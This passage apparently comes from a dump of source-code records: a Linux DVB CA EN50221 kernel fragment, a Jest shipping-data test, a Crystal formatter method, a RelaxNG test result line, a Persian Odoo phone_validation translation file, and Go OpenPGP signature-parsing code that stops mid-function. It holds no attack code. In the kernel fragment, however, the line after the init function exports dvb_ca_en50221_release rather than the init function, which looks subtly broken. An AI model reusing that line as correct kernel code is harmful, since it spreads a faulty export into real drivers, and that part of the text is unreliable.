(ret)\n\t\tgoto free_slot_info;\n\n\t/* now initialise each slot */\n\tfor (i = 0; i < slot_count; i++) {\n\t\tmemset(&ca->slot_info[i], 0, sizeof(struct dvb_ca_slot));\n\t\tca->slot_info[i].slot_state = DVB_CA_SLOTSTATE_NONE;\n\t\tatomic_set(&ca->slot_info[i].camchange_count, 0);\n\t\tca->slot_info[i].camchange_type = DVB_CA_EN50221_CAMCHANGE_REMOVED;\n\t\tmutex_init(&ca->slot_info[i].slot_lock);\n\t}\n\n\tmutex_init(&ca->ioctl_mutex);\n\n\tif (signal_pending(current)) {\n\t\tret = -EINTR;\n\t\tgoto unregister_device;\n\t}\n\tmb();\n\n\t/* create a kthread for monitoring this CA device */\n\tca->thread = kthread_run(dvb_ca_en50221_thread, ca, \"kdvb-ca-%i:%i\",\n\t\t\t\t ca->dvbdev->adapter->num, ca->dvbdev->id);\n\tif (IS_ERR(ca->thread)) {\n\t\tret = PTR_ERR(ca->thread);\n\t\tprintk(\"dvb_ca_init: failed to start kernel_thread (%d)\\n\",\n\t\t\tret);\n\t\tgoto unregister_device;\n\t}\n\treturn 0;\n\nunregister_device:\n\tdvb_unregister_device(ca->dvbdev);\nfree_slot_info:\n\tkfree(ca->slot_info);\nfree_ca:\n\tkfree(ca);\nexit:\n\tpubca->private = NULL;\n\treturn ret;\n}\nEXPORT_SYMBOL(dvb_ca_en50221_release);\n\n\n\n/**\n * Release a DVB CA EN50221 interface device.\n *\n * @ca_dev: The dvb_device_t instance for the CA device.\n * @ca: The associated dvb_ca instance.\n */\nvoid dvb_ca_en50221_release(struct dvb_ca_en50221 *pubca)\n{\n\tstruct dvb_ca_private *ca = pubca->private;\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* shutdown the thread if there was one */\n\tkthread_stop(ca->thread);\n\n\tfor (i = 0; i < ca->slot_count; i++) {\n\t\tdvb_ca_en50221_slot_shutdown(ca, i);\n\t\tvfree(ca->slot_info[i].rx_buffer.data);\n\t}\n\tkfree(ca->slot_info);\n\tdvb_unregister_device(ca->dvbdev);\n\tkfree(ca);\n\tpubca->private = NULL;\n}\n"} {"text": "import createShippingInfoData from './../../../helpers/createShippingInfoData';\n\ndescribe('Cart createShippingInfoData', () => {\n it('returns methods data', async () => {\n const methodsData = {\n country: 'UK',\n carrier_code: 'XX',\n method_code: 'YY'\n };\n const shippingInfoData = createShippingInfoData(methodsData);\n expect(shippingInfoData).toEqual({\n billingAddress: {},\n shippingAddress: {\n countryId: 'UK'\n },\n shippingCarrierCode: 'XX',\n shippingMethodCode: 'YY'\n });\n });\n\n it('returns methods data with shipping address', async () => {\n const methodsData = {\n country: 'UK',\n carrier_code: 'XX',\n method_code: 'YY',\n shippingAddress: {\n city: 'London',\n firstname: 'John',\n lastname: 'Doe',\n postcode: 'EC123',\n street: ['JohnDoe street']\n }\n };\n const shippingInfoData = createShippingInfoData(methodsData);\n expect(shippingInfoData).toEqual({\n billingAddress: {},\n shippingAddress: {\n city: 'London',\n countryId: 'UK',\n firstname: 'John',\n lastname: 'Doe',\n postcode: 'EC123',\n street: ['JohnDoe street']\n },\n shippingCarrierCode: 'XX',\n shippingMethodCode: 'YY'\n });\n });\n\n it('returns methods data with billing address', async () => {\n const methodsData = {\n country: 'UK',\n carrier_code: 'XX',\n method_code: 'YY',\n billingAddress: {\n city: 'London',\n countryId: 'UK',\n firstname: 'John',\n lastname: 'Doe',\n postcode: 'EC123',\n street: ['JohnDoe street']\n }\n };\n const shippingInfoData = createShippingInfoData(methodsData);\n expect(shippingInfoData).toEqual({\n shippingAddress: { countryId: 'UK' },\n billingAddress: {\n city: 'London',\n countryId: 'UK',\n firstname: 'John',\n lastname: 'Doe',\n postcode: 'EC123',\n street: ['JohnDoe street']\n },\n shippingCarrierCode: 'XX',\n 
shippingMethodCode: 'YY'\n });\n });\n\n it('doesn\\t add shippingCarrierCode or shippingMethodCode if missing carrier_code or method_code', async () => {\n const methodsData = {\n country: 'UK'\n };\n const shippingInfoData = createShippingInfoData(methodsData);\n expect(shippingInfoData).toEqual({\n billingAddress: {},\n shippingAddress: {\n countryId: 'UK'\n }\n });\n });\n});\n"} {"text": "module Mint\n class Formatter\n def format(node : Ast::ArrayAccess) : String\n index =\n case node.index\n when Int64\n node.index\n else\n format node.index.as(Ast::Expression)\n end\n\n lhs =\n format node.lhs\n\n \"#{lhs}[#{index}]\"\n end\n end\nend\n"} {"text": "./test/relaxng/tutor13_1_1.xml validates\n"} {"text": "# Translation of Odoo Server.\n# This file contains the translation of the following modules:\n# \t* phone_validation\n# \n# Translators:\n# Zahed Alfak , 2020\n# Martin Trigaux, 2020\n# Morovat Guivi , 2020\n# Hamid Darabi, 2020\n# Hamed Mohammadi , 2020\n# Hamid Reza Kaveh , 2020\n# \nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: Odoo Server saas~12.5\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: 2019-09-13 11:29+0000\\n\"\n\"PO-Revision-Date: 2019-08-26 09:12+0000\\n\"\n\"Last-Translator: Hamid Reza Kaveh , 2020\\n\"\n\"Language-Team: Persian (https://www.transifex.com/odoo/teams/41243/fa/)\\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: \\n\"\n\"Language: fa\\n\"\n\"Plural-Forms: nplurals=2; plural=(n > 1);\\n\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_needaction\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_needaction\nmsgid \"Action Needed\"\nmsgstr \"اقدام مورد نیاز است\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__active\nmsgid \"Active\"\nmsgstr \"فعال\"\n\n#. module: phone_validation\n#: model_terms:ir.actions.act_window,help:phone_validation.phone_blacklist_action\nmsgid \"Add a phone number in the blacklist\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model_terms:ir.ui.view,arch_db:phone_validation.phone_blacklist_view_search\nmsgid \"Archived\"\nmsgstr \"بایگانی شده\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_attachment_count\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_attachment_count\nmsgid \"Attachment Count\"\nmsgstr \"تعداد پیوست\"\n\n#. module: phone_validation\n#: model_terms:ir.ui.view,arch_db:phone_validation.phone_blacklist_view_tree\nmsgid \"Blacklist Date\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model_terms:ir.actions.act_window,help:phone_validation.phone_blacklist_action\nmsgid \"\"\n\"Blacklisted phone numbers means that the recipient won't receive SMS \"\n\"Marketing anymore.\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model,name:phone_validation.model_res_partner\nmsgid \"Contact\"\nmsgstr \"تماس\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__create_uid\nmsgid \"Created by\"\nmsgstr \"ایجاد شده توسط\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__create_date\nmsgid \"Created on\"\nmsgstr \"ایجاد شده در\"\n\n#. 
module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__display_name\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__display_name\n#: model:ir.model.fields,field_description:phone_validation.field_phone_validation_mixin__display_name\nmsgid \"Display Name\"\nmsgstr \"نام نمایشی\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__phone_sanitized\nmsgid \"\"\n\"Field used to store sanitized phone number. Helps speeding up searches and \"\n\"comparisons.\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_follower_ids\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_follower_ids\nmsgid \"Followers\"\nmsgstr \"دنبال‌کنندگان\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_channel_ids\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_channel_ids\nmsgid \"Followers (Channels)\"\nmsgstr \"پیروان (کانال ها)\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_partner_ids\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_partner_ids\nmsgid \"Followers (Partners)\"\nmsgstr \"پیروان (شرکاء)\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__id\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__id\n#: model:ir.model.fields,field_description:phone_validation.field_phone_validation_mixin__id\nmsgid \"ID\"\nmsgstr \"شناسه\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_needaction\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_unread\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_needaction\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_unread\nmsgid \"If checked, new messages require your attention.\"\nmsgstr \"\"\n\"اگر این گزینه را انتخاب کنید، پیام‌های جدید به توجه شما نیاز خواهند داشت.\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_has_error\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_has_error\nmsgid \"If checked, some messages have a delivery error.\"\nmsgstr \"در صورت بررسی ، برخی پیام ها خطای تحویل دارند.\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__phone_blacklisted\nmsgid \"\"\n\"If the email address is on the blacklist, the contact won't receive mass \"\n\"mailing anymore, from any list\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/tools/phone_validation.py:0\n#, python-format\nmsgid \"Impossible number %s: probably invalid number of digits\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/models/phone_blacklist.py:0\n#: code:addons/phone_validation/models/phone_blacklist.py:0\n#, python-format\nmsgid \"Invalid number %s\"\nmsgstr \"\"\n\n#. 
module: phone_validation\n#: code:addons/phone_validation/tools/phone_validation.py:0\n#, python-format\nmsgid \"Invalid number %s: probably incorrect prefix\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/models/mail_thread_phone.py:0\n#: code:addons/phone_validation/models/mail_thread_phone.py:0\n#, python-format\nmsgid \"Invalid primary phone field on model %s\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_is_follower\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_is_follower\nmsgid \"Is Follower\"\nmsgstr \"دنبال می کند\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone____last_update\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist____last_update\n#: model:ir.model.fields,field_description:phone_validation.field_phone_validation_mixin____last_update\nmsgid \"Last Modified on\"\nmsgstr \"آخرین تغییر در\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__write_uid\nmsgid \"Last Updated by\"\nmsgstr \"آخرین تغییر توسط\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__write_date\nmsgid \"Last Updated on\"\nmsgstr \"آخرین به روز رسانی در\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_main_attachment_id\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_main_attachment_id\nmsgid \"Main Attachment\"\nmsgstr \"پیوست اصلی\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_has_error\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_has_error\nmsgid \"Message Delivery error\"\nmsgstr \"خطای تحویل پیام\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_ids\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_ids\nmsgid \"Messages\"\nmsgstr \"پیام‌ها\"\n\n#. module: phone_validation\n#: model:ir.model.constraint,message:phone_validation.constraint_phone_blacklist_unique_number\nmsgid \"Number already exists\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_needaction_counter\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_needaction_counter\nmsgid \"Number of Actions\"\nmsgstr \"تعداد اقدامات\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_has_error_counter\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_has_error_counter\nmsgid \"Number of errors\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_needaction_counter\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_needaction_counter\nmsgid \"Number of messages which requires an action\"\nmsgstr \"تعداد پیام ها که نیاز به عمل\"\n\n#. 
module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_has_error_counter\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_has_error_counter\nmsgid \"Number of messages with delivery error\"\nmsgstr \"تعداد پیامهای با خطای تحویل\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_unread_counter\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_unread_counter\nmsgid \"Number of unread messages\"\nmsgstr \"تعداد پیام‌های خوانده نشده\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__number\nmsgid \"Number should be E164 formatted\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.ui.menu,name:phone_validation.phone_menu_main\nmsgid \"Phone / SMS\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.actions.act_window,name:phone_validation.phone_blacklist_action\n#: model:ir.model,name:phone_validation.model_phone_blacklist\n#: model:ir.ui.menu,name:phone_validation.phone_blacklist_menu\n#: model_terms:ir.ui.view,arch_db:phone_validation.phone_blacklist_view_form\n#: model_terms:ir.ui.view,arch_db:phone_validation.phone_blacklist_view_tree\nmsgid \"Phone Blacklist\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model,name:phone_validation.model_mail_thread_phone\nmsgid \"Phone Blacklist Mixin\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__phone_blacklisted\nmsgid \"Phone Blacklisted\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__number\nmsgid \"Phone Number\"\nmsgstr \"شماره تلفن\"\n\n#. module: phone_validation\n#: model:ir.model,name:phone_validation.model_phone_validation_mixin\nmsgid \"Phone Validation Mixin\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__phone_sanitized\nmsgid \"Sanitized Number\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/tools/phone_validation.py:0\n#, python-format\nmsgid \"\"\n\"Unable to format %s:\\n\"\n\"%s\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/tools/phone_validation.py:0\n#, python-format\nmsgid \"Unable to parse %s: %s\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_unread\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_unread\nmsgid \"Unread Messages\"\nmsgstr \"پیام های ناخوانده\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_unread_counter\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_unread_counter\nmsgid \"Unread Messages Counter\"\nmsgstr \"شمارنده پیام‌های خوانده‌نشده\"\n"} {"text": "// Copyright 2011 The Go Authors. 
All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\npackage packet\n\nimport (\n\t\"bytes\"\n\t\"crypto\"\n\t\"crypto/dsa\"\n\t\"crypto/ecdsa\"\n\t\"encoding/binary\"\n\t\"fmt\"\n\t\"hash\"\n\t\"io\"\n\t\"strconv\"\n\t\"time\"\n\n\t\"github.com/keybase/go-crypto/openpgp/errors\"\n\t\"github.com/keybase/go-crypto/openpgp/s2k\"\n\t\"github.com/keybase/go-crypto/rsa\"\n)\n\nconst (\n\t// See RFC 4880, section 5.2.3.21 for details.\n\tKeyFlagCertify = 1 << iota\n\tKeyFlagSign\n\tKeyFlagEncryptCommunications\n\tKeyFlagEncryptStorage\n)\n\n// Signer can be implemented by application code to do actual signing.\ntype Signer interface {\n\thash.Hash\n\tSign(sig *Signature) error\n\tKeyId() uint64\n\tPublicKeyAlgo() PublicKeyAlgorithm\n}\n\n// RevocationKey represents designated revoker packet. See RFC 4880\n// section 5.2.3.15 for details.\ntype RevocationKey struct {\n\tClass byte\n\tPublicKeyAlgo PublicKeyAlgorithm\n\tFingerprint []byte\n}\n\n// KeyFlagBits holds boolean whether any usage flags were provided in\n// the signature and BitField with KeyFlag* flags.\ntype KeyFlagBits struct {\n\tValid bool\n\tBitField byte\n}\n\n// Signature represents a signature. See RFC 4880, section 5.2.\ntype Signature struct {\n\tSigType SignatureType\n\tPubKeyAlgo PublicKeyAlgorithm\n\tHash crypto.Hash\n\n\t// HashSuffix is extra data that is hashed in after the signed data.\n\tHashSuffix []byte\n\t// HashTag contains the first two bytes of the hash for fast rejection\n\t// of bad signed data.\n\tHashTag [2]byte\n\tCreationTime time.Time\n\n\tRSASignature parsedMPI\n\tDSASigR, DSASigS parsedMPI\n\tECDSASigR, ECDSASigS parsedMPI\n\tEdDSASigR, EdDSASigS parsedMPI\n\n\t// rawSubpackets contains the unparsed subpackets, in order.\n\trawSubpackets []outputSubpacket\n\n\t// The following are optional so are nil when not included in the\n\t// signature.\n\n\tSigLifetimeSecs, KeyLifetimeSecs *uint32\n\tPreferredSymmetric, PreferredHash, PreferredCompression []uint8\n\tPreferredKeyServer string\n\tIssuerKeyId *uint64\n\tIsPrimaryId *bool\n\tIssuerFingerprint []byte\n\n\t// FlagsValid is set if any flags were given. See RFC 4880, section\n\t// 5.2.3.21 for details.\n\tFlagsValid bool\n\tFlagCertify, FlagSign, FlagEncryptCommunications, FlagEncryptStorage bool\n\n\t// RevocationReason is set if this signature has been revoked.\n\t// See RFC 4880, section 5.2.3.23 for details.\n\tRevocationReason *uint8\n\tRevocationReasonText string\n\n\t// PolicyURI is optional. See RFC 4880, Section 5.2.3.20 for details\n\tPolicyURI string\n\n\t// Regex is a regex that can match a PGP UID. See RFC 4880, 5.2.3.14 for details\n\tRegex string\n\n\t// MDC is set if this signature has a feature packet that indicates\n\t// support for MDC subpackets.\n\tMDC bool\n\n\t// EmbeddedSignature, if non-nil, is a signature of the parent key, by\n\t// this key. This prevents an attacker from claiming another's signing\n\t// subkey as their own.\n\tEmbeddedSignature *Signature\n\n\t// StubbedOutCriticalError is not fail-stop, since it shouldn't break key parsing\n\t// when appearing in WoT-style cross signatures. 
But it should prevent a signature\n\t// from being applied to a primary or subkey.\n\tStubbedOutCriticalError error\n\n\t// DesignaterRevoker will be present if this signature certifies a\n\t// designated revoking key id (3rd party key that can sign\n\t// revocation for this key).\n\tDesignatedRevoker *RevocationKey\n\n\toutSubpackets []outputSubpacket\n}\n\nfunc (sig *Signature) parse(r io.Reader) (err error) {\n\t// RFC 4880, section 5.2.3\n\tvar buf [5]byte\n\t_, err = readFull(r, buf[:1])\n\tif err != nil {\n\t\treturn\n\t}\n\tif buf[0] != 4 {\n\t\terr = errors.UnsupportedError(\"signature packet version \" + strconv.Itoa(int(buf[0])))\n\t\treturn\n\t}\n\n\t_, err = readFull(r, buf[:5])\n\tif err != nil {\n\t\treturn\n\t}\n\tsig.SigType = SignatureType(buf[0])\n\tsig.PubKeyAlgo = PublicKeyAlgorithm(buf[1])\n\tswitch sig.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly, PubKeyAlgoDSA, PubKeyAlgoECDSA, PubKeyAlgoEdDSA:\n\tdefault:\n\t\terr = errors.UnsupportedError(\"public key algorithm \" + strconv.Itoa(int(sig.PubKeyAlgo)))\n\t\treturn\n\t}\n\n\tvar ok bool\n\tsig.Hash, ok = s2k.HashIdToHash(buf[2])\n\tif !ok {\n\t\treturn errors.UnsupportedError(\"hash function \" + strconv.Itoa(int(buf[2])))\n\t}\n\n\thashedSubpacketsLength := int(buf[3])<<8 | int(buf[4])\n\tl := 6 + hashedSubpacketsLength\n\tsig.HashSuffix = make([]byte, l+6)\n\tsig.HashSuffix[0] = 4\n\tcopy(sig.HashSuffix[1:], buf[:5])\n\thashedSubpackets := sig.HashSuffix[6:l]\n\t_, err = readFull(r, hashedSubpackets)\n\tif err != nil {\n\t\treturn\n\t}\n\t// See RFC 4880, section 5.2.4\n\ttrailer := sig.HashSuffix[l:]\n\ttrailer[0] = 4\n\ttrailer[1] = 0xff\n\ttrailer[2] = uint8(l >> 24)\n\ttrailer[3] = uint8(l >> 16)\n\ttrailer[4] = uint8(l >> 8)\n\ttrailer[5] = uint8(l)\n\n\terr = parseSignatureSubpackets(sig, hashedSubpackets, true)\n\tif err != nil {\n\t\treturn\n\t}\n\n\t_, err = readFull(r, buf[:2])\n\tif err != nil {\n\t\treturn\n\t}\n\tunhashedSubpacketsLength := int(buf[0])<<8 | int(buf[1])\n\tunhashedSubpackets := make([]byte, unhashedSubpacketsLength)\n\t_, err = readFull(r, unhashedSubpackets)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = parseSignatureSubpackets(sig, unhashedSubpackets, false)\n\tif err != nil {\n\t\treturn\n\t}\n\n\t_, err = readFull(r, sig.HashTag[:2])\n\tif err != nil {\n\t\treturn\n\t}\n\n\tswitch sig.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly:\n\t\tsig.RSASignature.bytes, sig.RSASignature.bitLength, err = readMPI(r)\n\tcase PubKeyAlgoDSA:\n\t\tsig.DSASigR.bytes, sig.DSASigR.bitLength, err = readMPI(r)\n\t\tif err == nil {\n\t\t\tsig.DSASigS.bytes, sig.DSASigS.bitLength, err = readMPI(r)\n\t\t}\n\tcase PubKeyAlgoEdDSA:\n\t\tsig.EdDSASigR.bytes, sig.EdDSASigR.bitLength, err = readMPI(r)\n\t\tif err == nil {\n\t\t\tsig.EdDSASigS.bytes, sig.EdDSASigS.bitLength, err = readMPI(r)\n\t\t}\n\tcase PubKeyAlgoECDSA:\n\t\tsig.ECDSASigR.bytes, sig.ECDSASigR.bitLength, err = readMPI(r)\n\t\tif err == nil {\n\t\t\tsig.ECDSASigS.bytes, sig.ECDSASigS.bitLength, err = readMPI(r)\n\t\t}\n\tdefault:\n\t\tpanic(\"unreachable\")\n\t}\n\treturn\n}\n\n// parseSignatureSubpackets parses subpackets of the main signature packet. 
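It consumes\n// the data one subpacket at a time via parseSignatureSubpacket and errors if\n// no creation time subpacket was present. 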
See\n// RFC 4880, section 5.2.3.1.\nfunc parseSignatureSubpackets(sig *Signature, subpackets []byte, isHashed bool) (err error) {\n\tfor len(subpackets) > 0 {\n\t\tsubpackets, err = parseSignatureSubpacket(sig, subpackets, isHashed)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\tif sig.CreationTime.IsZero() {\n\t\terr = errors.StructuralError(\"no creation time in signature\")\n\t}\n\n\treturn\n}\n\ntype signatureSubpacketType uint8\n\nconst (\n\tcreationTimeSubpacket signatureSubpacketType = 2\n\tsignatureExpirationSubpacket signatureSubpacketType = 3\n\tregularExpressionSubpacket signatureSubpacketType = 6\n\tkeyExpirationSubpacket signatureSubpacketType = 9\n\tprefSymmetricAlgosSubpacket signatureSubpacketType = 11\n\trevocationKey signatureSubpacketType = 12\n\tissuerSubpacket signatureSubpacketType = 16\n\tprefHashAlgosSubpacket signatureSubpacketType = 21\n\tprefCompressionSubpacket signatureSubpacketType = 22\n\tprefKeyServerSubpacket signatureSubpacketType = 24\n\tprimaryUserIdSubpacket signatureSubpacketType = 25\n\tpolicyURISubpacket signatureSubpacketType = 26\n\tkeyFlagsSubpacket signatureSubpacketType = 27\n\treasonForRevocationSubpacket signatureSubpacketType = 29\n\tfeaturesSubpacket signatureSubpacketType = 30\n\tembeddedSignatureSubpacket signatureSubpacketType = 32\n\tissuerFingerprint signatureSubpacketType = 33\n)\n\n// parseSignatureSubpacket parses a single subpacket. len(subpacket) is >= 1.\nfunc parseSignatureSubpacket(sig *Signature, subpacket []byte, isHashed bool) (rest []byte, err error) {\n\t// RFC 4880, section 5.2.3.1\n\tvar (\n\t\tlength uint32\n\t\tpacketType signatureSubpacketType\n\t\tisCritical bool\n\t)\n\tswitch {\n\tcase subpacket[0] < 192:\n\t\tlength = uint32(subpacket[0])\n\t\tsubpacket = subpacket[1:]\n\tcase subpacket[0] < 255:\n\t\tif len(subpacket) < 2 {\n\t\t\tgoto Truncated\n\t\t}\n\t\tlength = uint32(subpacket[0]-192)<<8 + uint32(subpacket[1]) + 192\n\t\tsubpacket = subpacket[2:]\n\tdefault:\n\t\tif len(subpacket) < 5 {\n\t\t\tgoto Truncated\n\t\t}\n\t\tlength = uint32(subpacket[1])<<24 |\n\t\t\tuint32(subpacket[2])<<16 |\n\t\t\tuint32(subpacket[3])<<8 |\n\t\t\tuint32(subpacket[4])\n\t\tsubpacket = subpacket[5:]\n\t}\n\tif length > uint32(len(subpacket)) {\n\t\tgoto Truncated\n\t}\n\trest = subpacket[length:]\n\tsubpacket = subpacket[:length]\n\tif len(subpacket) == 0 {\n\t\terr = errors.StructuralError(\"zero length signature subpacket\")\n\t\treturn\n\t}\n\tpacketType = signatureSubpacketType(subpacket[0] & 0x7f)\n\tisCritical = subpacket[0]&0x80 == 0x80\n\tsubpacket = subpacket[1:]\n\tsig.rawSubpackets = append(sig.rawSubpackets, outputSubpacket{isHashed, packetType, isCritical, subpacket})\n\tswitch packetType {\n\tcase creationTimeSubpacket:\n\t\tif !isHashed {\n\t\t\terr = errors.StructuralError(\"signature creation time in non-hashed area\")\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) != 4 {\n\t\t\terr = errors.StructuralError(\"signature creation time not four bytes\")\n\t\t\treturn\n\t\t}\n\t\tt := binary.BigEndian.Uint32(subpacket)\n\t\tsig.CreationTime = time.Unix(int64(t), 0)\n\tcase signatureExpirationSubpacket:\n\t\t// Signature expiration time, section 5.2.3.10\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) != 4 {\n\t\t\terr = errors.StructuralError(\"expiration subpacket with bad length\")\n\t\t\treturn\n\t\t}\n\t\tsig.SigLifetimeSecs = new(uint32)\n\t\t*sig.SigLifetimeSecs = binary.BigEndian.Uint32(subpacket)\n\tcase keyExpirationSubpacket:\n\t\t// Key expiration time, section 5.2.3.6\n\t\tif !isHashed 
{\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) != 4 {\n\t\t\terr = errors.StructuralError(\"key expiration subpacket with bad length\")\n\t\t\treturn\n\t\t}\n\t\tsig.KeyLifetimeSecs = new(uint32)\n\t\t*sig.KeyLifetimeSecs = binary.BigEndian.Uint32(subpacket)\n\tcase prefSymmetricAlgosSubpacket:\n\t\t// Preferred symmetric algorithms, section 5.2.3.7\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tsig.PreferredSymmetric = make([]byte, len(subpacket))\n\t\tcopy(sig.PreferredSymmetric, subpacket)\n\tcase issuerSubpacket:\n\t\t// Issuer, section 5.2.3.5\n\t\tif len(subpacket) != 8 {\n\t\t\terr = errors.StructuralError(\"issuer subpacket with bad length\")\n\t\t\treturn\n\t\t}\n\t\tsig.IssuerKeyId = new(uint64)\n\t\t*sig.IssuerKeyId = binary.BigEndian.Uint64(subpacket)\n\tcase prefHashAlgosSubpacket:\n\t\t// Preferred hash algorithms, section 5.2.3.8\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tsig.PreferredHash = make([]byte, len(subpacket))\n\t\tcopy(sig.PreferredHash, subpacket)\n\tcase prefCompressionSubpacket:\n\t\t// Preferred compression algorithms, section 5.2.3.9\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tsig.PreferredCompression = make([]byte, len(subpacket))\n\t\tcopy(sig.PreferredCompression, subpacket)\n\tcase primaryUserIdSubpacket:\n\t\t// Primary User ID, section 5.2.3.19\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) != 1 {\n\t\t\terr = errors.StructuralError(\"primary user id subpacket with bad length\")\n\t\t\treturn\n\t\t}\n\t\tsig.IsPrimaryId = new(bool)\n\t\tif subpacket[0] > 0 {\n\t\t\t*sig.IsPrimaryId = true\n\t\t}\n\tcase keyFlagsSubpacket:\n\t\t// Key flags, section 5.2.3.21\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) == 0 {\n\t\t\terr = errors.StructuralError(\"empty key flags subpacket\")\n\t\t\treturn\n\t\t}\n\t\tif subpacket[0] != 0 {\n\t\t\tsig.FlagsValid = true\n\t\t\tif subpacket[0]&KeyFlagCertify != 0 